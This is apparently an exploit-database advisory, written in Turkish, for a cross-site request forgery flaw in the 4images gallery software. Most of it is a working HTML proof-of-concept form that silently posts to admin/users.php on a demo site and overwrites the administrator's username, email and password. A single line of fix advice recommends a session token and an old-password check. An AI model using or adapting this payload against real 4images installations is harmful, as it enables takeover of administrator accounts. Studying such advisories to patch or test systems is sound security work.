< ------------------- header data start ------------------- >

#############################################################

# Application Name : 4images

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir !

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir, Eski sifre sorulmalidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >



<form action=http://demo.opensourcecms.com/4images/admin/users.php ENCTYPE=multipart/form-data name=form method=post>
<input type=hidden name=action value=updateuser>
<input type=hidden name=user_id value=1>
<input type=hidden name=activation value=0>
<input type=text size=50 name=user_name value=admin><br>
<input type=text size=50 name=user_email value=[email protected]><br>
<input type=text size=50 name=user_password value=>
<input type=submit value= Kaydet class=button>
</form>

< -- bug code end of -- >